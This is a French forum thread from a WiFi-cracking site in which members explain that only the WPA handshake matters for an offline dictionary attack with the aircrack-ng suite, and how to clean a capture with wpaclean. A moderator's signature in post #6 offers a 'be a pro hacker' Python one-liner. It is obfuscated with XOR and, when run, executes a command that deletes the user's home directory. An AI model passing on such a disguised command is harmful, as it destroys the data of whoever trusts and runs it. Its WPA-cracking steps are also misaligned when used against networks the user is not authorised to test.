Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 22-03-2013 10:35:41

Anthonyy59
Membre V.I.P.

Faut-il continuer l'écoute d'un réseau pour optimiser le crack WPA?

Salut a tous, j'avais une petite question à propos du crack WPA.

Faut-il récupérer un maximum de ficher .cap pour optimiser le crack? Ou simplement le handshake suffit?

Merci d'avance ! smile

Dernière modification par Anthonyy59 (22-03-2013 22:04:13)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 22-03-2013 10:43:07

koala
Membre d'honneur
Lieu : In the sky

Re : Faut-il continuer l'écoute d'un réseau pour optimiser le crack WPA?

Un hanshake est unique au réseau, seul le handshake de ton réseau compte, a part si tu es près a passer plus d'un millions d'années a cracker dautres fichier.cap big_smile

#3 22-03-2013 16:05:21

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Il faut faire des titres descriptifs; "petite question sur le crack WPA" ça revient à ne rien dire vu que tu es dans la section crack de clef WPA et que tu vas poser une question, la seule information c'est "petite" mais ça ne décrit en rien le sujet.
"Avoir plusieurs  handshakes accélère-t'il le crack?" aurait été mieux wink

#4 22-03-2013 22:03:03

Anthonyy59
Membre V.I.P.

kcdtv a écrit :

Il faut faire des titres descriptifs; "petite question sur le crack WPA" ça revient à ne rien dire vu que tu es dans la section crack de clef WPA et que tu vas poser une question, la seule information c'est "petite" mais ça ne décrit en rien le sujet.
"Avoir plusieurs  handshakes accélère-t'il le crack?" aurait été mieux wink

Oui c'est vrai que tu as raison, mais je pense m'être mal exprimé.

Imaginons que je veuille crack un WPA: je lance airodump-ng suivi d'aireplay-ng pour obtenir ce Handshake.
A partie de là, je peux couper airodump-ng ? Ou je dois continuer à recuperer un maximum de ficher .cap sur le même réseau?

#5 22-03-2013 23:24:39

kcdtv
Membre d'honneur

Le seul paquet utile et utilisable pour le crack de clef WPA-WPA2; c'est le handshake. wink
Une fois que tu l'as obtenu tu peux lancer ton attaque par dictionnaire.
Bien évidement tu peux-devrais couper airodump-ng, ça ne sert à rien d'augmenter le volume de ton paquet de capture.
La vitesse de crack en wpa ne te dépend pas de la qualité de connexion ou du nombre de paquets de tel ou tel type récupérés.
Elle dépend simplement de ta puissance CPU-GPU, et le crack se fait "offline"

#6 23-03-2013 15:16:35

spawn
Modérateur

Aujourd'hui, le seul point de vulnérabilité du WPA est le handshake (à part dans certains cas particuliers, mais les attaques n'ont pas encore été écrites de manière généralisable).

Et un handshake, ce n'est pas si vulnérable que ça.
L'écoute prolongée d'un réseau ne t'apportera pas d'informations supplémentaires.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#7 23-03-2013 15:25:32

Anthonyy59
Membre V.I.P.

Merci a vous !
Comme j'ai essayé de cracker ma livebox, après un bon paquet d'heures le crack à échoué car il n'y avait pas la clé sur le dico, je me demandais si c'était un problème qui venait du ficher.cap

En tout cas merci vous répondez à ma question ! smile

#8 23-03-2013 17:44:51

kcdtv
Membre d'honneur

Ou ton handshake est bien reconnu et tu vois les clefs qui commencent à défiler à toutes vitesse dans ta console et tu vois bien aircrack-ng en action; où le handshake n'est pas complet, invalide, corrompu et dans ce cas  tu as un message d'erreur.
  Si ton handshake n'est pas reconnu, tu peux essayer de le "laver" avec l'ordre "wpaclean" (inclut dans la suite aircrack-ng)

wpaclean nouveau_handshake.cap ancien_handshake.cao

#9 23-03-2013 20:21:47

Anthonyy59
Membre V.I.P.

Le conseil est toujours bon a prendre !
Mais mon handshake était le bon, c'est juste que la clé n'était pas dans mon dico. Après 12h d'aircrack..
J'avais vu un topic où on pouvait télécharger plus que 4 milliards de clés mais là ça peut prendre des jours !

Annonce